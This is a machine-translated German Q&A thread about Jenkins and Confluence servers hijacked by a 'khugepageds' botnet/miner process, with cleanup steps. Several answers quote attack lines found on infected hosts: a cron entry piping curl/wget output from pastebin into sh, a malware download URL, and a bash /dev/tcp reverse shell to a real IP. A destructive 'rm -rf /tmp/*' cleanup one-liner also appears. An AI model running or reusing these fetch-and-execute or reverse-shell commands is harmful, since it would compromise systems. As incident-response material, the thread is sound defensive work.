Jenkins Hohe CPU-Auslastung Khugepageds

Also das Bild oben zeigt einen Befehl khugepageds mit 98 zu 100 % von CPU-Zeiten.

Ich habe versucht zu finden wie funktioniert jenkins verwenden Sie diesen Befehl, oder was zu tun, aber war nicht erfolgreich.

Habe ich Folgendes

pkill jenkins
service jenkins stoppen
service jenkins starten

Wenn ich pkill natürlich den Verbrauch nach unten geht, aber einmal neu starten Ihr wieder nach oben.

Jemand hatte dieses Problem vor?

Wir haben dieses Problem auch. Ich habe versucht, das deaktivieren THP (khugepaged) beim Booten und zur Laufzeit gemäß dieser Anleitung access.redhat.com/solutions/46111 nach dieser Methode (askubuntu.com/a/610707/565564) für die Einstellung aktiviert und defrag, um nie und das (stackoverflow.com/a/52591781/679667) zu deaktivieren, die beim Booten in grub. Reboot. Noch sehen khugepaged zeigen, bis für jenkins-user und es ist mit 200% CPU 🙁

InformationsquelleAutor user3052526 | 2019-03-23

centos jenkins

19

So, wir haben gerade diese uns passieren. Wie pro die anderen Antworten, und einige Graben unsere eigenen, sind wir in der Lage waren, zu töten, zu verarbeiten (und halten Sie Sie getötet wurden), indem Sie den folgenden Befehl ausführen...
```
rm -rf /tmp/*; crontab -r -u jenkins; kill -9 PID_OF_khugepageds; crontab -r -u jenkins; rm -rf /tmp/*; reboot -h now;
```
Stellen Sie sicher, zu ersetzen PID_OF_khugepageds mit der PID auf Ihrem Rechner. Es wird auch deaktivieren Sie die crontab-Eintrag. All das als einen Befehl, so dass der Prozess nicht wiederbeleben, selbst. Die Maschine wird neu starten, je den letzten Befehl.

HINWEIS: Während der Befehl oben sollte den Prozess zu beenden, werden Sie wahrscheinlich wollen, um roll - /regenerieren Sie Ihre SSH-Schlüssel (auf dem Jenkins-Maschine, BitBucket/GitHub etc., und alle anderen Maschinen, dass Jenkins hatte den Zugang zu) - und vielleicht sogar spin-up eine neue Jenkins-Instanz (wenn Sie diese option haben).
- Vielen Dank, wir hatten dieses Problem auch, und dies scheint zu funktionieren. Haben Sie eine Idee haben, wie Sie diese bekommen haben könnte auf das system? Eine Sicherheitsanfälligkeit, in der ein jenkins-plugin vielleicht?
- Leider wissen wir nicht wirklich.
- Vielen Dank. Du hast meinen Tag gerettet!!!!
InformationsquelleAutor HeffZilla
10

Ja, wir waren auch betroffen von dieser Sicherheitsanfälligkeit, Dank pittss wir waren in der Lage zu erkennen ein bisschen mehr darüber.

Sollten Sie der /var/logs/syslogs für die curl pastebin script, das scheint zu beginnen, die mais-Prozess auf dem system, wird es versuchen, wieder eskaliert Zugriff auf Ordner /tmp und installieren Sie unerwünschte Pakete/script.

Entfernen Sie alles aus dem /tmp-Ordner, stoppen jenkins, überprüfen Sie die cron-Prozess und entfernen Sie diejenigen, die verdächtig erscheinen, starten Sie die VM.

Seit über Sicherheitsanfälligkeit fügt unerwünschte ausführbare Datei unter /tmp foler und es versucht, Zugriff auf die VM via ssh.
Diese Sicherheitsanfälligkeit auch einen cron-Prozess auf Ihrem system Vorsicht zu entfernen, sowie.

Überprüfen Sie auch die ~/.ssh Ordner für die Datei known_hosts und authorized_keys für alle verdächtigen öffentlichen ssh-Schlüssel. Die Angreifer fügen Ihren ssh-Schlüssel, um Zugang zu Ihrem system.

Hoffe, das hilft.
- Es war in der Tat eine verdächtige Schlüssel cheers Mann
- sollte die akzeptierte Antwort, er funktioniert perfekt
- Für diejenigen, die hier ankommen, von einem Atlassian Confluence installation ausstellen ähnliche Themen, finden Sie unter confluence.atlassian.com/doc/...
InformationsquelleAutor MalhotraVijay
10

Dies ist ein Zusammenfluss Sicherheitsanfälligkeit https://nvd.nist.gov/vuln/detail/CVE-2019-3396 veröffentlicht am 25 Mar 2019. Es ermöglicht entfernten Angreifern zu erreichen, path traversal, remote-code-Ausführung auf einer Confluence-Server oder Data Center-Instanz per server-side-Vorlage Einspritzung.

Mögliche Lösung
1. Nicht ausgeführt Confluence als root!
2. Stop-botnet-agent: kill -9 $(cat /tmp/.X11unix); killall -9 khugepageds
3. Haltestelle Confluence: <confluence_home>/app/bin/stop-confluence.sh
4. Entfernen Sie defekte crontab: crontab -u <confluence_user> -r
5. Stecken Sie das Loch durch die Sperrung von gefährdeten Pfad /rest/tinymce/1/makro/Vorschau in frontend-server; für nginx ist es so etwas wie dieses:
```
    location /rest/tinymce/1/macro/preview {
        return 403;
    }
```
1. Neustart Von Confluence.
Der exploit

Enthält zwei Teile: shell-Skript aus https://pastebin.com/raw/xmxHzu5P - und x86_64-Linux-binary von http://sowcar.com/t6/696/1554470365x2890174166.jpg

Das erste Skript killt alle anderen bekannten Trojaner - /Viren - /botnet-Agenten, downloads und erstellt der binäre aus /tmp/kerberods und durchläuft die /root/.ein.ssh/known_hosts versucht, verbreiten sich in der Nähe von Maschinen.

Den binären der Größe 3395072 und Datum Apr 5 16:19 ist vollgepackt mit LSD ausführbaren packer (http://lsd.dg.com). Ich habe nicht noch geprüft, was es tut. Sieht aus wie ein botnet controller.
- Aus Neugier: Woher hast du die information aus, dass dieses spezifische url war / ist der Täter?
- Die crontab eines infizierten confluence Benutzer enthält einen Eintrag wie diesen: (curl -fsSL https://pastebin.com/raw/xmxHzu5P||wget -q -O- https://pastebin.com/raw/xmxHzu5P)|sed -e 's/\r//g'|sh. Siehe auch diesem Artikel
- Ich war auf der tinymce url der confluence-Instanz. War nicht 100% klar.
- Ich habe /rest/tinymce/1/makro/Vorschau von infizierten server-HTTP-Protokolle. Btw .bash_history des confluence user hatten reverse-shell-Befehl bash -i >& /dev/tcp/45.76.191.111/2012 0>&1 so einige menschliche intervention statt.
InformationsquelleAutor Vladimir Prodan
6

es scheinen, wie Verletzlichkeit. versuchen Sie schauen von syslog (/var/log/syslog, nicht jenkinks log) etwa wie folgt: CRON (jenkins) CMD ((curl -fsSL https://pastebin.com/raw/***||wget -q -O- https://pastebin.com/raw/***)|sh).

Dass, wenn, versuchen, aufhören, jenkins, klar /tmp dir und töten alle pids begann mit jenkins-Benutzer.

Nach, wenn die cpu-Auslastung nach unten, versuchen Sie, aktualisieren Sie auf Letzte tls-version von jenkins. Weiter nach starten jenkins update alle plugins in jenkins.

InformationsquelleAutor pittss
0

Eine Lösung, die funktioniert, weil der cron-Datei wird nur neu erstellt, ist zu leer jenkins' cronfile, ich habe auch das Eigentum, und auch die Datei unveränderlich.

Dieser endlich aufhörte, diesen Prozess aus Tritte in..

InformationsquelleAutor Tony
0

In meinem Fall war dies zu machen baut nach dem Zufallsprinzip fehlschlagen mit der folgenden Fehlermeldung:

Maven JVM unerwartet beendet mit exit-code 137

Es dauerte eine Weile, um die gebührende Aufmerksamkeit auf die Khugepageds Prozess, da jeder Ort, den ich Lesen über diese Fehler die gegebene Lösung war die Steigerung Speicher.

Problem wurde gelöst mit @HeffZilla Lösung.

InformationsquelleAutor FkJ

Schreibe einen Kommentar

Du musst angemeldet sein, um einen Kommentar abzugeben.

Mögliche Lösung

Der exploit